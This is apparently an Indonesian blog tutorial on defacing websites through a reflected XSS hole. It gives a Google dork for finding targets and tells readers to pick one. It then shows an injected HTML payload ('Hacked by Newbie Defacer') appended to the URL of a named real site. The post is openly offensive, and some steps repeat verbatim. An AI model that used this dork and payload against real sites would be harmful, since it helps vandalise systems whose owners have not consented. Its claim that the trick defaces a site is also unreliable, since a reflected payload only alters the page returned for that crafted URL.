Pertama, Masukan Dorknya :
inurl:"/showcatrows.php?CategoryID="
2). Kalo sudah, Pilih salah satu web yang akan kita deface.
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
4). Kemudian tekan Enter.
inurl:"/showcatrows.php?CategoryID="
2). Kalo sudah, Pilih salah satu web yang akan kita deface.
Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Contoh : http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13"><marquee><h1>Hacked by Newbie Defacer</h1></marquee>
4). Kemudian tekan Enter.
5). Selesai, Website sudah berhasil kita deface :D
Triknya
memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS
sebuah website dengan memasukan sebuah code/script HTML.
Tag :
Defacing
0 Komentar untuk "Tutorial Deface menggunakan Teknik XSS Vulnerability"